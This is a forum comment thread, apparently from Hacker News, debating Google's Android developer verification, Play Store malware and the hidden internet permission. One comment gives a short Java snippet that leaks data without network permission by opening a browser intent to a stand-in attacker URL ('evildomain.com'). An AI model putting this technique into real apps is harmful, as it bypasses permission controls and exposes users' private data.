More info:
https://developer.android.com/developer-verification
https://support.google.com/googleplay/android-developer/answ...
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
https://developer.android.com/develop/connectivity/network-o...
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it. But even if it is flawed, don't you think Google would be a bit more incentivized to make the Internet permission work as expected if people could disable it?
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
It's been there since Android 1.0.
What's missing is a way for the user to deny it.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not suprising that they don't let you deny this one, when they don't even show it in the store.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
Intent i = new Intent(Intent.ACTION_VIEW, uri);
startActivity(i);
I just tend to give Google little benefit of the doubt here, considering where their revenue comes from. Same as when they introduced manifest v3, ostensibly for security but just conveniently happening to neuter adblocking. Disabling access to the internet permission for apps aligns with their profit motive.
Because it is obvious. Just open a web browser.
More details here: https://old.reddit.com/r/androiddev/comments/ci4tdq/were_on_...
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issue MS had with github ( sanctions and KYC checks ).
Hey we were already on board with this, you don't have to convince us.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?
This permission has existed for longer than runtime permissions. You have never been able to revoke it, it was just something you agreed to when you installed the app or you didn't install the app.
It was "removed" in that era because if every app requests the same permission, then nobody cares about it anymore. When every app asks for the same thing, users stop paying attention to it. So no, it had fuck all to do with ads because that was never a thing in the first place. And ad blocking doesn't require this permission, either.
> Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
You can still use it for this. Apps are required to declare the permission still, it's listed on the Play Store under the "permissions" section. Similarly the OS reports the same thing. Presumably F-droid or whatever else also has a list of permissions before you install, and it'll be listed there.
Although Google's own Calculator app requires Internet permission. Take that for what's it worth.
That's also why there's a warning before installing really old apps, they may run with extra permissions.
So rather than just dismissing the argument via insulting language, can you provide a reasonable alternative explanation for why this setting isn't exposed to the user?
https://www.bitdefender.com/en-us/blog/hotforsecurity/hacker...
Sure. It’s also not Google’s problem.
It’s not Victorinox’s problem of someone uses a Swiss Army knife to cut someone else. It’s not Toyota’s problem if someone deliberately runs over a pedestrian.
If they don't do that then their reputation will suffer and governments might take notice. So, in practice, big companies do have to care about their users, not individually but in aggregate.
This is like a car manufacturer preventing the installation of all unapproved aftermarket accessories by claiming they're protecting you from a stalker installing a tracker on your car.
The solution here is just to get rid of artificial country limitations which make some users download APKs. None of those make sense in the online world anyways.
Of that they still refuse to sandbox the play store.
It's easy to see that there's a pattern on what they are copying from GrapheneOS.
and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?
Still an awful solution that will get bypassed easily, of course. But there's more to this than "Google decided to be a bunch of dicks today".
That's not even a little bit true? There's a ton of 'normal' permissions, almost none of which are user-overrideable. Like, say, android.permission.VIBRATE. Or android.permission.GET_PACKAGE_SIZE. Android has an obscene number of permissions ( https://developer.android.com/reference/android/Manifest.per... ) and almost none of them have a UI to control them nor any ability to be rejected
> It is an obvious win for an advertising/surveillance company like Google. What is wack about it?
How, exactly? How does Google benefit from random 3p apps having Internet access? And remember, Google has play services on every device to proxy anything it needs/wants.
And I did provide 2 reasons why that's the case for Internet specifically, neither of which were even attempted to be refuted in this comment chain
Didn't Kia go over a decade without caring or improving until the Kia Boys stuff?
Some chinese skins do offer the ability to revoke internet access for apps. I wonder why the western ones don't?
Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."
https://www.electronforge.io/guides/code-signing/code-signin...
That's still security, albeit an entirely different threat model.
It's absolutely essential that Google Play Services have "root" permissions and circumvent the permissions system normal apps have. How else would Google have access to all of your data? :)
Calculator.apk wants to open the web page https://eviltracker.example.com. Allow this time? Allow for 24 hours? Allow and don't ask me again?
I pretty solidly refuted your first reason (internet connection is ubiquitious, apps don't need it). I pointed out that there are whole categories of apps that don't need a network connection. You never bothered to refute my argument and are now claiming that I didn't address that point. You claim it is a 'ubiquitous' permission, but haven't said why a level sensor app that just reads the MEMS gyro sensor would need a network connection at all. So that's point 1 sorted, which I already addressed and you are pretending wasn't refuted.
Point 2 was "2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar"
I never addressed this, because it seemed extraneous to the discussion. This data exfiltration is purely a hypothetical at this point, since apps can always rely on a network connection. Sure, if the network setting was exposed to the user and was able to be toggled, there might be ways to bypass that. But that is hypothetical, and relies on hypothetical security loopholes. No apps are currently doing this, since apps can't have their network permissions toggled. The possibility of potentially bypassing the system network permission toggle doesn't seem germane, since it's a hypothetical. To use your words, it's a 'whack-ass conspiracy theory' and not a germane concern.
You've resorted to ad-hominem by insinuating that my viewpoint as a conspiracy theory and haven't even attempted to address my point that there are whole categories of apps that don't need network connections. You also are trying to claim that I haven't addressed points you made, while ignoring my argument that rebutted those claims. I'm sorry, but since you want to engage in this way,why are you so addicted to the taste of Google boot leather? Why are you trying to say that Google doesn't want to protect its ad network? Android apps using Google adsense to serve ads to users clearly benefits them, I don't even see why this is controversial.
App page => "About this app" => "App permissions / See more" at the bottom of the page => look for "have full network access" in "Other"
Doing this for all apps would be wild. Doing this just for those that don't request the internet permission just encourages more apps to request it (it is basically universally used anyway). "Huh, why does my calculator need internet" has never actually been effective at helping people avoid malware at any meaningful scale.
A lot of people are pretending there is no malware problem and that Google should just do nothing and move on. That's not helpful.
This bullshit needs to be aborted as soon as possible, but a solution for mobile malware is desperately needed. The crutch used on desktop, invasive antivirus, doesn't work on Android unless it comes from the OS manufacturer, so we need a new solution.
I mean, would you chop off your own foot? No? Then we should all be in agreeance. Google is definitely forcing network permission for every app to maximize their ad revenue.
It’s something possible only on grapheneos as far as I know.
Yes, there are apps out there that try to trick the system and when you use them, instead of looking innocent, it's actually a casino app or something. But Google usually finds those. Are there any apps impersonating a bank? Because that is what regular people care about & think of when someone says "malicious".
They don't care if an app tracks what other apps are installed, what the user taps on, etc. Arguably they should care, but they don't lose money from it.
1. Most users do not use fdroid or APKs to download software. They download software from the play store.
2. Therefore almost all malware will target the play store.
3. Therefore most malware actively used comes from the play store.
4. Compounded, the play store does almost nothing to prevent malware and actively encourages certain types of malware like spyware and adware.
5. Compounded, Google gets a cut from each piece of malware sold on the play store or advertised on the play store, therefore they have no incentive to prevent malware in any significant way.
No it wouldn't, not at all.
90% of apps on your phone do not need to be apps. Facebook does not need to be an app. Instagram does not need to be an app.
This is a sober reminder that apps are executables code that is running on your phone with very little sandbox. Its not like a web browser.
We do not need to execute compiled binaries that are closed source to buy parking that one time. No, no we don't.
Why do we? Because as I've said - such apps are much more powerful than the web browser and can therefore be used as spyware or keyloggers. Most apps on Android, including most Google apps, can be regarded as spyware.
Companies don't want to give up their de facto malware they've built up, and now users are trained to just install whatever the fuck on their phone.
We have given software 1000x more permission than it needs to do want it does. And now, we sit back and complain about malware.
This starts with Google, this starts with Meta, this starts with big tech. They directly caused all this malware by forcing users into downloading executables so they can exfiltrate your key presses.
This isn't necessarily true even if you're right on all the other points. Even if most malware is on the Play Store, it can still be true that, out of the Android users that DO get malware (or rather, those that actually report malware to Google), most of them got it from outside the Play Store.
It can be true that a minority of users get any malware at all because Play Store is safe, but most users in that minority get malware because they are open to using apps from outside Play Store.
If Google is making this change in service of safety, they would protect a large chunk of that minority, by verifying apps downloaded outside Play Store. If it's necessary for Google to help these users, this change is not "completely unnecessary".